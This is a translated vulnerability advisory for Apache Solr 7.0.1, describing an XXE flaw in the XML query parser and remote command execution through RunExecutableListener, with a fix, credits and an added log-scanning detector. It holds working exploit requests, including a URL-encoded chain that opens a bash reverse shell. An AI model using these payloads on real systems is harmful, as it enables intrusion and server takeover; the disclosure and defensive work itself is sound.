
Apache Solr 7.0.1 XML External Entity Expansion / Remote Code Execution
Author:
19 October 2017 15:36:55
5860 reads
Source: 爱尖刀 (IjianDao)

Original source: https://www.exploit-db.com/exploits/43009/

Translation note: if an existing translation source exists, please contact the editor.

First vulnerability: XML External Entity expansion (deftype = XMLParser)

Lucene contains a query parser that can build complete Lucene queries from an XML data structure. Solr has supported the XML query parser for search queries since version 5.1.

The problem is that the Lucene XML parser does not explicitly disallow DOCTYPE declarations and external entity expansion, so special entities pointing to external files (via file://) or external URLs (via http://) can be included in the XML document:

Example usage:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"'><a></a>'}

When Solr parses this request, it makes an HTTP request to http://xxx.s.artsploit.com/xxx and includes its content in the DOCTYPE definition.

Given that the parser type can be defined inside the search query, which usually comes from untrusted user input such as a search field on a website, an external attacker can make arbitrary HTTP requests from the local Solr instance and bypass firewall restrictions.

For example, this vulnerability could be used to send malicious data to the '/upload' handler:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}

This vulnerability can also be exploited as a blind XXE, using the FTP wrapper, to read arbitrary local files from the Solr server.

Vulnerable code location:

/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java

import java.io.InputStream;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// ParserException is Lucene's own org.apache.lucene.queryparser.xml.ParserException
static Document parseXML(InputStream pXmlFile) throws ParserException {
    // Default factory settings: DOCTYPE declarations and external entities are allowed
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      // Any SYSTEM entity in the DOCTYPE (file:// or http://) is fetched during parsing
      doc = db.parse(pXmlFile);
    }
    catch (Exception se) {
      throw new ParserException("Error parsing XML stream:" + se, se);
    }
    return doc;
}

Steps to reproduce:

1. Set up a listener on any port with the netcat command "nc -lv 4444"

2. Open:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}

3. You will see a request from the Solr server on your netcat listener. This proves that the DOCTYPE declaration was resolved.

Remediation advice:

Consider adding the following lines to /solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java:

import java.io.InputStream;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// ParserException is Lucene's own org.apache.lucene.queryparser.xml.ParserException
static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
      //protect from XXE attacks
      // reject any DOCTYPE declaration outright, and disable both kinds of external entities
      dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
      dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
      dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      // With the features above, input containing a DOCTYPE fails here instead of being resolved
      doc = db.parse(pXmlFile);
    }
    catch (Exception se) {
      throw new ParserException("Error parsing XML stream:" + se, se);
    }
    return doc;
}

Related links:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

CVSS v2 base score: 9.0
(AV:N/AC:L/Au:N/C:C/I:P/A:P)

Second vulnerability: remote code execution (add-listener: RunExecutableListener)

Solr's "RunExecutableListener" class can be used to execute arbitrary commands on specific events, for example after every update query. The problem is that such a listener can be enabled with any parameters through the Config API's add-listener command:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198
 
{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"ANYCOMMAND",
    "dir":"/usr/bin/",
    "args":["ANYARGS"]
  }
}

The "exe", "args" and "dir" parameters can be crafted through an HTTP request that modifies the collection's configuration. This means that anyone who can send an HTTP request to the Config API is able to execute arbitrary commands when the "postCommit" event is triggered, which gives a remote attacker remote code execution.

Steps to reproduce:

Step 1. Create a new collection:

http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2

Step 2. Set up a listener on any port with the netcat command "nc -lv 4444"

Step 3. Add a new RunExecutableListener to the collection, with the "exe" attribute set to the name of the command to run ("/usr/bin/curl") and the "args" attribute set to "http://localhost:4444/executed", so that the attacker's netcat listener is requested:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198
 
{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"curl",
    "dir":"/usr/bin/",
    "args":["http://localhost:4444/executed"]
  }
}

Step 4. Update "newcollection" to trigger execution of the RunExecutableListener:

POST /solr/newcollection/update HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 19
 
[{"id":"test"}]

Step 5. You will see a request from the Solr server on your netcat listener. This proves that the curl command was executed on the server.

CVSS v2 base score: 10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)

Summary:

By combining these two vulnerabilities, an external attacker can achieve remote code execution without even having direct access to the Solr server. The only requirement is that the attacker can specify part of the query in the "q" search parameter (which is the case for many web applications that use Solr).

Let's say an attacker can only send search queries (the "q" param) to Solr's "/select" endpoint.

Here is the full exploitation scenario:

Step 1. Create a new collection with the help of XXE. If the attacker already knows any collection name, this step can be skipped.

http://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20

Without URL encoding:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2"><a></a>'}

Step 2. Set up a netcat listener: "nc -lv 4444"

Step 3. Add a new RunExecutableListener via XXE:

http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%73%65%6c%65%63%74%3f%71%3d%78%78%78%26%71%74%3d%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%63%6f%6e%66%69%67%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%32%35%37%62%25%32%35%32%32%25%32%35%36%31%25%32%35%36%34%25%32%35%36%34%25%32%35%32%64%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%37%62%25%32%35%32%32%25%32%35%36%35%25%32%35%37%36%25%32%35%36%35%25%32%35%36%65%25%32%35%37%34%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%30%25%32%35%36%66%25%32%35%37%33%25%32%35%37%34%25%32%35%34%33%25%32%35%36%66%25%32%35%36%64%25%32%35%36%64%25%32%35%36%39%25%32%35%37%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%65%25%32%35%36%31%25%32%35%36%64%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%36%65%25%32%35%36%35%25%32%35%37%37%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%33%25%32%35%36%63%25%32%35%36%31%25%32%35%37%33%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%66%25%32%35%36%63%25%32%35%37%32%25%32%35%32%65%25%32%35%35%32%25%32%35%37%35%25%32%35%36%65%25%32%35%34%35%25%32%35%37%38%25%32%35%36%35%25%32%35%36%33%25%32%35%37%35%25%32%35%37%34%25%32%35%36%31%25%32%35%36%32%25%32%35%36%63%25%32%35%36%35%25%32%35%34%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%37%38%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37
%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%34%25%32%35%36%39%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%31%25%32%35%37%32%25%32%35%36%37%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%35%62%25%32%35%32%32%25%32%35%32%64%25%32%35%36%33%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%34%25%32%35%34%30%25%32%35%37%63%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%65%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%36%33%25%32%35%36%38%25%32%35%36%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%36%32%25%32%35%36%31%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%64%25%32%35%36%39%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%65%25%32%35%32%36%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%34%25%32%35%36%35%25%32%35%37%36%25%32%35%32%66%25%32%35%37%34%25%32%35%36%33%25%32%35%37%30%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%37%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%31%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%33%25%32%35%33%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%30%25%32%35%33%65%25%32%35%32%36%25%32%35%33%31%25%32%35%32%32%25%32%35%35%64%25%32%35%37%64%25%32%35%37%64%26%73%68%61%72%64%73%3d%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%22%3e%3c%61%3e%3c%2f%61%3e%27%7d

Without URL encoding:

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","/bin/bash","-i",">&","/dev/tcp/127.0.0.1/1234","0>&1"]}}&shards=localhost:8983/"><a></a>'}

As you may have noticed, updating the configuration requires a POST request to the application, but via the XXE vulnerability we can only send HTTP GET requests. A special trick is used here: if Solr receives a GET request like "/select?q=123&qt=/xxx&shards=localhost:8983/", it actually converts it into a POST and sends that request to the shards specified in the "shards" parameter. It also overrides the request path with the "qt" parameter, so we can change it from "/select" to "/config".

The resulting HTTP request to localhost:8983 is a POST request with stream.body="our_value". This is exactly what is needed for exploitation.

Step 4. Update "newcollection" via XXE to trigger execution of the RunExecutableListener:

http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%75%70%64%61%74%65%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%35%62%25%37%62%25%32%32%25%36%39%25%36%34%25%32%32%25%33%61%25%32%32%25%34%31%25%34%31%25%34%31%25%32%32%25%37%64%25%35%64%26%63%6f%6d%6d%69%74%3d%74%72%75%65%26%6f%76%65%72%77%72%69%74%65%3d%74%72%75%65%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20

Without URL encoding:

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/update?stream.body=[{"id":"AAA"}]&commit=true&overwrite=true"><a></a>'} 

Step 5. When the command "bin/sh -c $@|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1" is executed on update, a new shell session is opened on the netcat listener. The attacker can then execute any command on the server running Solr.

Solr responds to all three requests with different errors, but all of these errors occur after the desired actions have been executed.
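As an added defender-side example (not part of the advisory or of Solr itself), the following Python scans constructed Solr request log lines for the three patterns described above: an xmlparser query carrying a DOCTYPE, an add-listener call installing solr.RunExecutableListener, and the GET-to-POST pivot built from the qt= and shards= parameters. The log line format, the sample lines and the indicator names are assumptions; percent-decoding is repeated so the double-encoded stream.body is normalised before matching.

```python
import re
from urllib.parse import unquote

# Constructed sample Solr request log lines ("METHOD path-or-body"); not from the advisory.
# Lines 1-3 mirror the three stages of the chained attack as Solr would see them, line 4 is benign.
SAMPLE_LOG = [
    "GET /solr/gettingstarted/select?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2Flocalhost%3A4444%2Fx%22%3E%3Ca%3E%3C%2Fa%3E%27%7D",
    'POST /solr/newcollection/config {"add-listener":{"event":"postCommit","class":"solr.RunExecutableListener","exe":"curl"}}',
    "GET /solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body=%257b%2522add-listener%2522%253a%257b%2522class%2522%253a%2522solr.RunExecutableListener%2522%257d%257d&shards=localhost:8983/",
    "GET /solr/gettingstarted/select?q=title%3Asolr+AND+body%3Axml&rows=10",
]

def fully_decode(text, max_rounds=5):
    """Percent-decode repeatedly so double-encoded payloads (the XXE-carried
    stream.body is encoded twice) are normalised before signature matching."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

XMLPARSER_DOCTYPE = re.compile(r"\{!xmlparser\b.*<!DOCTYPE", re.IGNORECASE | re.DOTALL)
RUN_EXEC_LISTENER = re.compile(r"add-listener.*RunExecutableListener", re.IGNORECASE | re.DOTALL)
QT_OVERRIDE_TO_CONFIG = re.compile(r"[?&]qt=[^&\s]*?/config", re.IGNORECASE)
SHARDS_PARAM = re.compile(r"[?&]shards=", re.IGNORECASE)

def classify(line):
    """Return the list of attack indicators found in one request log line."""
    method, _, rest = line.partition(" ")
    decoded = fully_decode(rest)
    hits = []
    if XMLPARSER_DOCTYPE.search(decoded):
        hits.append("xmlparser-doctype")          # XXE/SSRF through the XML query parser
    if RUN_EXEC_LISTENER.search(decoded):
        hits.append("run-executable-listener")    # Config API listener with exe/args/dir
    if method == "GET" and SHARDS_PARAM.search(decoded) and QT_OVERRIDE_TO_CONFIG.search(decoded):
        hits.append("get-to-post-config-pivot")   # shards= plus qt=/config turns a GET into a POST
    return hits

def scan(lines):
    """Map 1-based line numbers to their indicators, skipping benign lines."""
    return {i: h for i, line in enumerate(lines, 1) if (h := classify(line))}
```

A GET that carries the whole chain inside its DOCTYPE URL decodes to all three indicators at once, so a rule that alerts on any non-empty result from classify() covers the first hop as well as the loopback hop shown in line 3.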

All of these vulnerabilities were tested on the latest version of Apache Solr with the default cloud configuration (bin/solr start -e cloud -noprompt).

These vulnerabilities were discovered by:

Michael Stepankin (JPMorgan Chase)

Olga Barinova (Gotham Digital Science)

